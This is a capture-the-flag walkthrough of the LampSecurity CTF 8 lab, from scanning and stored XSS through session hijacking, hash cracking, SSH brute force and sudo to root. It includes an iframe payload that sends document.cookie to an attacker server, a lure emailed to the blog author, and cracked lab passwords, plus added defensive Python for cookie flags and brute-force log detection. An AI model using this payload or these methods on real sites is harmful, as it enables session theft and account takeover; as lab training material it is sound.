In this article I am going to capture the flags for the LampSecurity CTF 8 challenge. This is a beginner-level challenge. We will start with scanning the environment and end with getting root access. In between, my target will be to capture the hidden flags. So let's get started.
List of actions:
- Scan the network
- HTTP enumeration
- Web vulnerability scanning
- Spidering Web directory
- Session hijack
- Crack the password
- Brute-forcing SSH credentials
- Get the access and capture the flags
- Root privilege
Before starting the scan, let's first discover the network with netdiscover.
We have successfully discovered our target.
1. Scan the network
We will start with a network scan using nmap. For this, let's execute the below command in the Kali console.
In the output we found that the following ports are open:
- 21
- 22
- 25
- 80
- 110
- 111
- 139
- 143
- 443
- 445
- 993
- 995
- 3306
- 5801, 5802, 5901, 5902, 5903, 5904
- 6001, 6002, 6004, 6003
Based on the above result, it is confirmed that a web application is running on port 80, so we will choose that as our starting point.
2. Web vulnerability scanning
Let's scan the web application with Nikto and try to discover the vulnerabilities present.
After the scan we got the below results, which are important for the rest of the walkthrough.
- The Phpinfo.php page is accessible.
- The application is vulnerable to an XSS attack.
Now, while exploring the web application, let's check the source code of the home page.
We have successfully captured our first flag.
#flag#550e1bafe077ff0b0b67f4e32f29d751
After getting the first flag, we will go back to the Nikto result and explore the phpinfo page.
Great! We have got our second flag in a row.
#flag#550e1bafe077ff0b0b67f4e32f29d751
3. Spidering Web directory
Now go to the home page and read any of the articles to get a further clue.
While exploring the page I found a new directory which was not displayed during the vulnerability scan. So we will scan the directory using dirb to get any useful information.
In the scan result I found something different, which pushed me to check further.
Let's explore the above path and see what else we can get.
Bingo! We have got our third flag.
#flag#57dbe55b42b307fb4115146d239955d0
4. Session hijack
Now let's create a user account to get user access.
I have successfully created one user named "iamuser". Now go to any of the blog posts and check whether the comment section is vulnerable to XSS.
Enter the below script and click on preview.
<script>alert('hi')</script>
From the above result it is clear that the application is vulnerable to XSS.
Now we will try to hijack the session cookie of the writer of the blog and forward it to a cookie capture application running on our own server. To know more, please read the previous article.
To do this, paste the below HTML code inside the comment box and save it.
<html>
<body>
<b> wanteddev</b>
<u>click me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.1.2/Cookie_stealer.php?c="+document.cookie)> </iframe >
</body>
</html>
The above code will give us the session ID of whoever visits the comment first. Here we will make the blog writer visit the link so that we get his cookie ID and can hijack his session. To do that, we will send the link to him via email and wait until he clicks on it.
Now click on the username.
After that, paste the link in the contact form and send it to the user.
Now wait for a couple of minutes and we will get the session ID on our server.
We have successfully got the session ID.
Now we will try to take over the session by pasting the copied session ID using the cookie manager Firefox plugin.
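The theft above works because the comment body is rendered as live HTML and the session cookie can be read through document.cookie. As an added example (not part of the original walkthrough), this Python sketch reports the flags missing from a Set-Cookie header and encodes a comment for output; the cookie name and sample comment are constructed.

```python
import html
import re

# Constructed samples: a session cookie set without flags, the same cookie
# hardened, and a comment carrying the alert() test used in this walkthrough.
WEAK_COOKIE = "SESSexample=0123abcd; path=/"
HARDENED_COOKIE = "SESSexample=0123abcd; path=/; HttpOnly; Secure; SameSite=Lax"
SAMPLE_COMMENT = "<b>nice post</b><script>alert('hi')</script>"

# Markup that lets a stored comment run script in another visitor's browser.
ACTIVE_MARKUP = re.compile(
    r"<\s*(script|iframe|object|embed)\b|javascript\s*:|\bon\w+\s*=", re.I)


def cookie_findings(set_cookie: str) -> list[str]:
    """Return the protections missing from one Set-Cookie header value."""
    attrs = {part.strip().split("=", 1)[0].lower()
             for part in set_cookie.split(";")[1:]}
    findings = []
    if "httponly" not in attrs:
        findings.append("no HttpOnly: page script can read it via document.cookie")
    if "secure" not in attrs:
        findings.append("no Secure: sent over plain HTTP")
    if "samesite" not in attrs:
        findings.append("no SameSite attribute set")
    return findings


def render_comment(body: str) -> str:
    """Encode a comment for HTML output so its tags display as text."""
    return html.escape(body, quote=True)


def has_active_markup(body: str) -> bool:
    """Flag a stored comment that contains script-capable markup."""
    return bool(ACTIVE_MARKUP.search(body))


if __name__ == "__main__":
    for name, cookie in (("weak", WEAK_COOKIE), ("hardened", HARDENED_COOKIE)):
        print(name, cookie_findings(cookie) or "ok")
    print("raw comment flagged:", has_active_markup(SAMPLE_COMMENT))
    print("rendered as:", render_comment(SAMPLE_COMMENT))
```

With HttpOnly set, script injected into a page cannot read the session cookie, and with output encoding the injected tags never execute in the first place.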
Our next step is to post a SQL query and try to fetch the user details.
As we know, Drupal's default table is user and the columns for user and password are user and pass respectively.
So go to content management and create content, then click on page. Copy and paste the below SQL with PHP code, select the content type as PHP and then click on preview.
You will get the current user details with the MD5 password hash.
5. Crack the password
Save the hashes in a file and try to crack them using the John the Ripper tool.
After the cracking process we got the below results.
6. Brute-forcing SSH credentials
Let's save the users and passwords in separate files for our next step, which is brute-forcing the SSH login.
After that, let's execute the below command in the terminal and wait for a success message.
Sadly, we did not get any success. Still, there is no need to worry; let's explore the blogger profile and see if we get any further hint.
From the above screenshot we can see that the user Steve has his user name in the email as spinkton. Similarly, we will check each user profile by editing the URL and store the user names in a file.
Now let's try to brute-force again with the new user list.
This time we got three successful credentials:
bdio – passw0rd
jharraway – letmein!
spinkton – football123
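From the defender's side, a run like this shows up in the sshd log as one source failing against many usernames and then succeeding. The following is an added example (not from the original article) that flags that pattern in Python; the log lines are constructed and the thresholds are assumptions to tune.

```python
import re
from collections import defaultdict

# Constructed sshd log lines in OpenSSH's message format. Times, host and
# addresses (RFC 5737 documentation range) are sample values.
SAMPLE_LOG = """\
Mar  1 10:00:01 web sshd[901]: Failed password for invalid user admin from 192.0.2.10 port 40001 ssh2
Mar  1 10:00:02 web sshd[902]: Failed password for root from 192.0.2.10 port 40002 ssh2
Mar  1 10:00:03 web sshd[903]: Failed password for bdio from 192.0.2.10 port 40003 ssh2
Mar  1 10:00:04 web sshd[904]: Failed password for jharraway from 192.0.2.10 port 40004 ssh2
Mar  1 10:00:05 web sshd[905]: Failed password for invalid user steve from 192.0.2.10 port 40005 ssh2
Mar  1 10:00:06 web sshd[906]: Accepted password for spinkton from 192.0.2.10 port 40006 ssh2
Mar  1 10:05:00 web sshd[950]: Failed password for jharraway from 192.0.2.77 port 51000 ssh2
Mar  1 10:05:09 web sshd[951]: Accepted password for jharraway from 192.0.2.77 port 51001 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")


def brute_force_report(log_text, min_failures=5, min_users=3):
    """Per source address: failed attempts, distinct users tried, and any
    login accepted after the address crossed both thresholds."""
    failures = defaultdict(int)
    users = defaultdict(set)
    logins_after = defaultdict(list)
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failures[ip] += 1
            users[ip].add(user)
        elif failures[ip] >= min_failures and len(users[ip]) >= min_users:
            logins_after[ip].append(user)  # success right after a guessing run
    return {
        ip: {"failures": count, "users_tried": len(users[ip]),
             "logins_after": logins_after[ip]}
        for ip, count in failures.items()
        if count >= min_failures and len(users[ip]) >= min_users
    }


if __name__ == "__main__":
    for ip, info in brute_force_report(SAMPLE_LOG).items():
        print(ip, info)
```

An address with a non-empty logins_after list is the case to triage first: the account named there should have its password reset and its sessions reviewed.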
7. Get the access and capture the flags
Let's try to log in with each credential, one by one.
Great, we have got another flag here.
Now try to log in with the next credential. Nice! We have got another flag inside this.
Let's move to the next credential. Again! We have got one more flag inside.
8. Root privilege
After all this, let's try a sudo login to check whether this user has root privilege.
Awesome! We have successfully got the root user.
Thanks for reading my article. Please let me know your valuable feedback in the comment section below.